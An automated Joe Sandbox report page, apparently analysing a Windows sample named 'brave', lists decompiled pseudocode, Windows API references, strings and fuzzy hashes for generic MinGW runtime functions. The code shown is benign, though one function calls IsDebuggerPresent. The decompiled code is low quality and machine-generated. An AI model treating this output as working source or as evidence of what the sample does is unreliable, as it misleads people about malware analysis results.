Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcpy$memset
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::_M_replace_aux$basic_string::insert
API String ID: 438689982-1339558951
Opcode ID: 2aa7705d7efa051678438d68cb09cc562f26b0b831d3bb896a7316ff393a9a71
Instruction ID: c310478a49d039d5cd441b39aaa5f402022c5156136a5364d73227b68cc7cac4
Opcode Fuzzy Hash: 2aa7705d7efa051678438d68cb09cc562f26b0b831d3bb896a7316ff393a9a71
Instruction Fuzzy Hash: 855123A2B0F29641EA139A768A501F85B509F05FD4F5855B2DF1CD73D2DD2EE9E1C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60191C0 Relevance: 13.6, APIs: 9, Instructions: 129
COMMON

Download Yara Rule

C-Code - Quality: 29%

			E00007FF67FF6A60191C0(void* __esi, long long* __rcx, void* __rdx) {
				long long _v72;
				void* _t12;
				long long* _t28;
				intOrPtr _t47;

				_t28 = __rcx;
				if (__rcx == 0) goto 0xa6019380;
				_t47 =  *((intOrPtr*)(__rcx));
				r13d = 0x16;
				if (_t47 == 0) goto 0xa60192b4;
				if (_t47 == 0xffffffff) goto 0xa60192d0;
				_t1 = _t47 + 0x98; // 0x98
				_t3 = _t47 + 0x70; // 0x70
				_v72 = _t1;
				r8d = 0xffffffff;
				_t12 = E00007FF67FF6A6019120(0,  *((intOrPtr*)(_t47 + 0xa8)), _t3);
				r13d = _t12;
				if (_t12 != 0) goto 0xa60192b4;
				if (TryEnterCriticalSection(??) == 0) goto 0xa60193c0;
				if ( *((intOrPtr*)(_t47 + 8)) -  *((intOrPtr*)(_t47 + 0x10)) > 0) goto 0xa6019390;
				 *_t28 = 0;
				E00007FF67FF6A6018880(1,  *((intOrPtr*)(_t47 + 0xa8)), _t3, _t1);
				CloseHandle(??);
				CloseHandle(??);
				LeaveCriticalSection(??);
				DeleteCriticalSection(??);
				DeleteCriticalSection(??);
				DeleteCriticalSection(??);
				free(??);
				return r13d;
			}

0x7ff6a60191ce
0x7ff6a60191d4
0x7ff6a60191da
0x7ff6a60191dd
0x7ff6a60191e6
0x7ff6a60191f0
0x7ff6a60191f6
0x7ff6a6019206
0x7ff6a601920d
0x7ff6a6019215
0x7ff6a601921b
0x7ff6a6019220
0x7ff6a6019225
0x7ff6a6019243
0x7ff6a6019253
0x7ff6a6019259
0x7ff6a601926b
0x7ff6a601927f
0x7ff6a6019289
0x7ff6a601928e
0x7ff6a601929e
0x7ff6a60192a3
0x7ff6a60192aa
0x7ff6a60192af
0x7ff6a60192c5

APIs

Part of subcall function 00007FF6A6019120: EnterCriticalSection.KERNEL32(?,?,?,?,00007FF6A6019749), ref: 00007FF6A6019146
Part of subcall function 00007FF6A6019120: LeaveCriticalSection.KERNEL32(?,00007FF6A6019749,?,?,?,?,?,?,?,?,?,?,?,00007FF6A62C1400,?), ref: 00007FF6A601916B

TryEnterCriticalSection.KERNEL32 ref: 00007FF6A6019233
CloseHandle.KERNEL32 ref: 00007FF6A601927F
CloseHandle.KERNEL32 ref: 00007FF6A6019289
LeaveCriticalSection.KERNEL32 ref: 00007FF6A601928E
DeleteCriticalSection.KERNEL32 ref: 00007FF6A601929E
DeleteCriticalSection.KERNEL32 ref: 00007FF6A60192A3
DeleteCriticalSection.KERNEL32 ref: 00007FF6A60192AA
free.MSVCRT ref: 00007FF6A60192AF
LeaveCriticalSection.KERNEL32 ref: 00007FF6A60193B1

Part of subcall function 00007FF6A6018880: EnterCriticalSection.KERNEL32 ref: 00007FF6A6018898
Part of subcall function 00007FF6A6018880: ReleaseSemaphore.KERNEL32 ref: 00007FF6A60188C6
Part of subcall function 00007FF6A6018880: LeaveCriticalSection.KERNEL32 ref: 00007FF6A60188D3

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CriticalSection$Leave$DeleteEnter$CloseHandle$ReleaseSemaphorefree
String ID:
API String ID: 897415695-0
Opcode ID: a0b6630a7d97047e0030e229e683856c82cc15d2976108efe7bffb770ea2e6fd
Instruction ID: ec7cef4d1bb92a954e608bd8af3b1cb44e023221a324111eb9b52c24af3bb230
Opcode Fuzzy Hash: a0b6630a7d97047e0030e229e683856c82cc15d2976108efe7bffb770ea2e6fd
Instruction Fuzzy Hash: B3517A21A0AA4281EB509B62DA547BA36A4BF45F9CF444531DD5EC33D1CF3EE5A2C321

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6018BA0 Relevance: 13.6, APIs: 9, Instructions: 81COMMON

Download Yara Rule

APIs

calloc.MSVCRT(?,00007FF6A62C1400,00000000,00007FF6A6017B97,?,?,?,00007FF6A6017CC5,?,?,?,?,00007FF6A6017E65,?,00007FF6A62C1400), ref: 00007FF6A6018BCC
CreateSemaphoreA.KERNEL32 ref: 00007FF6A6018C0C
CreateSemaphoreA.KERNEL32 ref: 00007FF6A6018C23
InitializeCriticalSection.KERNEL32(?,00007FF6A62C1400,00000000,00007FF6A6017B97,?,?,?,00007FF6A6017CC5,?,?,?,?,00007FF6A6017E65,?,00007FF6A62C1400), ref: 00007FF6A6018C4B
InitializeCriticalSection.KERNEL32(?,00007FF6A62C1400,00000000,00007FF6A6017B97,?,?,?,00007FF6A6017CC5,?,?,?,?,00007FF6A6017E65,?,00007FF6A62C1400), ref: 00007FF6A6018C52
InitializeCriticalSection.KERNEL32(?,00007FF6A62C1400,00000000,00007FF6A6017B97,?,?,?,00007FF6A6017CC5,?,?,?,?,00007FF6A6017E65,?,00007FF6A62C1400), ref: 00007FF6A6018C59

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: CriticalInitializeSection$CreateSemaphore$calloc
String ID:
API String ID: 2075313795-0
Opcode ID: 7c892f574ebb44d14683540b960821f729198a1c4daf112854c0d4a023215e6b
Instruction ID: 7bd9e8201ed86b175e39d27dc1ae09ef8c259fabe2580633aaf10f0ca9ee4a8a
Opcode Fuzzy Hash: 7c892f574ebb44d14683540b960821f729198a1c4daf112854c0d4a023215e6b
Instruction Fuzzy Hash: 99219132B0771286FB59DB25E958B6A2694EF44B98F054535CA1D873C0EE3E9891C300

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A600E650 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 138
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E00007FF67FF6A600E650(void* __ebx, long __rcx, long long __rdx, long long __r8, long long __r9, long long _a16, long long _a24, long long _a32) {
				void* _v32;
				intOrPtr _v108;
				void* _v144;
				void* _t19;
				void* _t20;
				void* _t22;
				void* _t26;
				intOrPtr _t42;
				long long _t44;
				intOrPtr _t45;
				intOrPtr* _t46;
				long long _t47;
				intOrPtr _t48;
				intOrPtr* _t49;
				intOrPtr _t50;
				void* _t51;
				void* _t52;
				signed long long _t55;
				long long _t59;
				intOrPtr _t64;
				struct _MEMORY_BASIC_INFORMATION* _t67;
				intOrPtr _t76;
				long long _t80;

				_t26 = __ebx;
				_t44 =  &_a16;
				_a16 = __rdx;
				_a24 = __r8;
				_a32 = __r9;
				_v32 = _t44;
				_t20 = E00007FF67FF6A6021D50(_t19, 2, _t44, __rcx);
				r8d = 0x1b;
				0xa60216c8(_t51);
				_t52 = _v32;
				E00007FF67FF6A6021D50(_t20, 2, _t44, "Mingw-w64 runtime failure:\n");
				_t59 = _t44;
				0xa6021648();
				0xa6021710();
				asm("o16 nop [eax+eax]");
				_t80 = _t59;
				if (_t26 <= 0) goto 0xa600e7f0;
				_t45 =  *0xa62c10f8; // 0x67be5ff5c0
				_t46 = _t45 + 0x18;
				asm("o16 nop [eax+eax]");
				_t64 =  *_t46;
				if (_t64 - _t80 > 0) goto 0xa600e70c;
				_t76 =  *((intOrPtr*)(_t46 + 8));
				r8d =  *((intOrPtr*)(_t76 + 8));
				if (_t80 - _t64 + _t76 < 0) goto 0xa600e793;
				_t47 = _t46 + 0x28;
				if (1 != _t26) goto 0xa600e6f0;
				_t22 = E00007FF67FF6A600F3C0();
				if (_t47 == 0) goto 0xa600e812;
				_t48 =  *0xa62c10f8; // 0x67be5ff5c0
				_t55 =  *0xa62c10f4 +  *0xa62c10f4 * 4 << 3;
				_t49 = _t48 + _t55;
				 *((long long*)(_t49 + 0x20)) = _t47;
				 *_t49 = 0;
				E00007FF67FF6A600F4F0(_t22, _t76);
				r8d = 0x30;
				_t50 =  *0xa62c10f8; // 0x67be5ff5c0
				 *((long long*)(_t50 + _t55 + 0x18)) = _t80 + _t49;
				VirtualQuery(_t52, _t67, __rcx);
				_t42 = _t50;
				if (_t42 == 0) goto 0xa600e7f7;
				if (_t42 == 0) goto 0xa600e78c;
				if (_t42 != 0) goto 0xa600e7a0;
				 *0xa62c10f4 =  *0xa62c10f4 + 1;
				return _v108;
			}

0x7ff6a600e650
0x7ff6a600e65a
0x7ff6a600e664
0x7ff6a600e669
0x7ff6a600e66e
0x7ff6a600e673
0x7ff6a600e678
0x7ff6a600e67d
0x7ff6a600e692
0x7ff6a600e697
0x7ff6a600e6a1
0x7ff6a600e6a9
0x7ff6a600e6af
0x7ff6a600e6b4
0x7ff6a600e6ba
0x7ff6a600e6cf
0x7ff6a600e6d4
0x7ff6a600e6da
0x7ff6a600e6e3
0x7ff6a600e6e7
0x7ff6a600e6f0
0x7ff6a600e6f6
0x7ff6a600e6f8
0x7ff6a600e6fc
0x7ff6a600e706
0x7ff6a600e70f
0x7ff6a600e715
0x7ff6a600e71a
0x7ff6a600e725
0x7ff6a600e72b
0x7ff6a600e736
0x7ff6a600e73a
0x7ff6a600e73d
0x7ff6a600e741
0x7ff6a600e747
0x7ff6a600e754
0x7ff6a600e75d
0x7ff6a600e764
0x7ff6a600e769
0x7ff6a600e76f
0x7ff6a600e772
0x7ff6a600e782
0x7ff6a600e78a
0x7ff6a600e78c
0x7ff6a600e79b

APIs

VirtualQuery.KERNEL32 ref: 00007FF6A600E769

Strings

Address %p has no image-section, xrefs: 00007FF6A600E6C0, 00007FF6A600E815
VirtualProtect failed with code 0x%x, xrefs: 00007FF6A600E7DE
Mingw-w64 runtime failure:, xrefs: 00007FF6A600E688
VirtualQuery failed for %d bytes at address %p, xrefs: 00007FF6A600E801

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: 132a4c11c153de298ffea9ed1bdabd017d4d66a2df506e748bccd0aa60d22546
Instruction ID: bd1611452913de9c7c60d98e5f2f16003346cbe2b485f5ce2c9499bd42b86929
Opcode Fuzzy Hash: 132a4c11c153de298ffea9ed1bdabd017d4d66a2df506e748bccd0aa60d22546
Instruction Fuzzy Hash: E951E032A0AA4281EB109F11F9456A97760FF84F94F494135DF0D97399EE3EE4A5C700

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A601CD30 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 122COMMON

Download Yara Rule

Strings

%*.*s, xrefs: 00007FF6A601CE75
%-*.*s, xrefs: 00007FF6A601CEC6
%.*s, xrefs: 00007FF6A601CEB8

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: %*.*s$%-*.*s$%.*s
API String ID: 0-4054516066
Opcode ID: 3b4b1a4249cd6db309c4553ff8de0bac3b9e23fda156ad8bb14e5570f57846da
Instruction ID: 98af063ae0558993dad9679f9dc690e0d8a48ff7db53c89434b905162321b971
Opcode Fuzzy Hash: 3b4b1a4249cd6db309c4553ff8de0bac3b9e23fda156ad8bb14e5570f57846da
Instruction Fuzzy Hash: 335187B2A1A25286E7608F35C24577977E1EF44F9CF168135CB08CB688DE3EE9D08B50

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A601C900 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 110
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00007FF67FF6A601C900(void* __edx, void* __rax, void* __rcx, void* __r8) {
				signed int _v72;
				char _v80;
				intOrPtr _t19;
				intOrPtr _t28;
				void* _t40;
				void* _t48;
				void* _t52;
				void* _t53;
				char* _t62;

				_t52 = __rax;
				_t19 =  *((intOrPtr*)(__r8 + 0x10));
				_t53 = __r8;
				if (_t19 < 0) goto 0xa601c91f;
				_t40 =  >  ? _t19 : __edx;
				r8d =  *((intOrPtr*)(__r8 + 0xc));
				if (( *(__r8 + 8) & 0x00006000) == 0x6000) goto 0xa601ca28;
				if (_t40 - r8d < 0) goto 0xa601c9c0;
				 *((intOrPtr*)(__r8 + 0xc)) = 0xffffffff;
				if (_t40 > 0) goto 0xa601c97b;
				goto 0xa601ca0d;
				_t62 = __rcx + __rax;
				E00007FF67FF6A601C8A0(_v72 & 0xffff, __r8);
				if (_t40 == 0) goto 0xa601ca0d;
				_v80 = 0;
				strlen(??);
				E00007FF67FF6A6021940( &_v72, _t62, _t52,  &_v80);
				_t48 = _t52;
				if (_t48 == 0) goto 0xa601ca0d;
				if (_t48 >= 0) goto 0xa601c960;
				_v72 =  *_t62;
				goto 0xa601c965;
				asm("o16 nop [cs:eax+eax]");
				r8d = r8d - _t40 - 1;
				 *((intOrPtr*)(_t53 + 0xc)) = r8d;
				if (0 != 0) goto 0xa601c94a;
				r8d = r8d - 1;
				 *((intOrPtr*)(_t53 + 0xc)) = r8d;
				E00007FF67FF6A601C8A0(0x20, _t53);
				 *((intOrPtr*)(_t53 + 0xc)) = _t52 - 1;
				if ( *((intOrPtr*)(_t53 + 0xc)) != 0) goto 0xa601c9e0;
				goto 0xa601c94a;
				E00007FF67FF6A601C8A0(0x20, _t53);
				_t28 =  *((intOrPtr*)(_t53 + 0xc));
				 *((intOrPtr*)(_t53 + 0xc)) = _t52 - 1;
				if (_t28 > 0) goto 0xa601ca00;
				return _t28;
			}

0x7ff6a601c900
0x7ff6a601c90a
0x7ff6a601c913
0x7ff6a601c918
0x7ff6a601c91c
0x7ff6a601c922
0x7ff6a601c934
0x7ff6a601c93d
0x7ff6a601c943
0x7ff6a601c956
0x7ff6a601c958
0x7ff6a601c96b
0x7ff6a601c96e
0x7ff6a601c975
0x7ff6a601c97e
0x7ff6a601c989
0x7ff6a601c99a
0x7ff6a601c99f
0x7ff6a601c9a2
0x7ff6a601c9a4
0x7ff6a601c9af
0x7ff6a601c9b4
0x7ff6a601c9b6
0x7ff6a601c9c0
0x7ff6a601c9c3
0x7ff6a601c9ca
0x7ff6a601c9d0
0x7ff6a601c9d4
0x7ff6a601c9e8
0x7ff6a601c9f3
0x7ff6a601c9f8
0x7ff6a601c9fa
0x7ff6a601ca08
0x7ff6a601ca0d
0x7ff6a601ca13
0x7ff6a601ca18
0x7ff6a601ca24

Strings

%.*S, xrefs: 00007FF6A601CA68
%-*.*S, xrefs: 00007FF6A601CA76
%*.*S, xrefs: 00007FF6A601CA3D

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID:
String ID: %*.*S$%-*.*S$%.*S
API String ID: 0-2115465065
Opcode ID: 7168d2604b3189bc1086008fb78c7252569c5abbf682eefe2c3ff4568daf00a2
Instruction ID: 7f8b9a535647721355fa086d7c45a7c3bff36ec8c39a120d2f9c4495e6184ae1
Opcode Fuzzy Hash: 7168d2604b3189bc1086008fb78c7252569c5abbf682eefe2c3ff4568daf00a2
Instruction Fuzzy Hash: 9541B273B1A24246F7509A25D6046796291EF84FACF49C131DB4DC76C9DE3EE4E18B20

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6016EE0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 35
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00007FF67FF6A6016EE0(void* __rcx) {
				long _t1;

				_t1 = GetLastError();
				if (_t1 != 0) goto 0xa6016f00;
				return _t1;
			}

0x7ff6a6016eea
0x7ff6a6016ef2
0x7ff6a6016efb

APIs

GetLastError.KERNEL32 ref: 00007FF6A6016EEA
FormatMessageA.KERNEL32 ref: 00007FF6A6016F2B
IsDebuggerPresent.KERNEL32 ref: 00007FF6A6016F35

Strings

aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaAaaAAaaaAaAAaaaaaAaAaaaaaaaaa, xrefs: 00007FF6A6016EE2

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: DebuggerErrorFormatLastMessagePresent
String ID: aaaaaaaaaaaaaaaaaaAAAAAAAAAAAaAAaAaAaaAAaaaAaAAaaaaaAaAaaaaaaaaa
API String ID: 2392558662-340595167
Opcode ID: fd52d147f527fa6bcd06c01c60e71c22fdd217dc7770cd6842f4e7a378731cf7
Instruction ID: fec31be114fe0f385db9970ba0185ea8ee99b9ed84cb92da60fac49ad4c8c483
Opcode Fuzzy Hash: fd52d147f527fa6bcd06c01c60e71c22fdd217dc7770cd6842f4e7a378731cf7
Instruction Fuzzy Hash: 5D013661A2A94281E7549B15FD5473A62A0BF85FC8F540038DB4EC2658EF3EE594C710

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A60245C0 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 215stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6A60245E9
memcmp.MSVCRT ref: 00007FF6A6024608
memcmp.MSVCRT ref: 00007FF6A6024696
memcmp.MSVCRT ref: 00007FF6A6024718

Part of subcall function 00007FF6A6031250: strlen.MSVCRT ref: 00007FF6A603126E

memcmp.MSVCRT ref: 00007FF6A60247C4

Strings

%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A6024649, 00007FF6A60246D3, 00007FF6A6024755, 00007FF6A6024801, 00007FF6A602481A
basic_string::compare, xrefs: 00007FF6A6024642, 00007FF6A60246CC, 00007FF6A602474E, 00007FF6A60247FA, 00007FF6A6024813

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493304770.00007FF6A62C1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493329294.00007FF6A62C3000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493342810.00007FF6A62C6000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493379688.00007FF6A62C7000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_7ff6a6000000_brave.jbxd

Similarity

API ID: memcmp$strlen
String ID: %s: __pos (which is %zu) > this->size() (which is %zu)$basic_string::compare
API String ID: 3738950036-1697194757
Opcode ID: 68f9f2bcd5ab65c1f543f9db557d2865906ff8277c6dcd0d61bc8145445e6c47
Instruction ID: 194e1e39e0dbddee96232213ec75f3fb1bd31a3eb0ccf796169f7fad75271701
Opcode Fuzzy Hash: 68f9f2bcd5ab65c1f543f9db557d2865906ff8277c6dcd0d61bc8145445e6c47
Instruction Fuzzy Hash: 7A51F5A2B0A58241FE119A36EE442E853819F19FE4F9C4271DF2CE77D6ED1EDAD18304

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF6A6025670 Relevance: 10.7, APIs: 5, Strings: 2, Instructions: 202stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 00007FF6A6025699
memcmp.MSVCRT ref: 00007FF6A60256BA
memcmp.MSVCRT ref: 00007FF6A6025746
memcmp.MSVCRT ref: 00007FF6A60257C5

Part of subcall function 00007FF6A6031250: strlen.MSVCRT ref: 00007FF6A603126E

memcmp.MSVCRT ref: 00007FF6A6025861

Strings

basic_string::compare, xrefs: 00007FF6A60256F4, 00007FF6A602577C, 00007FF6A60257FB, 00007FF6A6025897, 00007FF6A60258B0
%s: __pos (which is %zu) > this->size() (which is %zu), xrefs: 00007FF6A60256FB, 00007FF6A6025783, 00007FF6A6025802, 00007FF6A602589E, 00007FF6A60258B7

Memory Dump Source

Source File: 0000000E.00000002.488815440.00007FF6A6001000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF6A6000000, based on PE: true

Associated: 0000000E.00000002.488792972.00007FF6A6000000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489355640.00007FF6A6033000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.489417315.00007FF6A6035000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493077871.00007FF6A62B1000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493140163.00007FF6A62B3000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000E.00000002.493267109.00007FF6A62B9000.00000002.00000001.01000000.00000009.sdmpDownload File
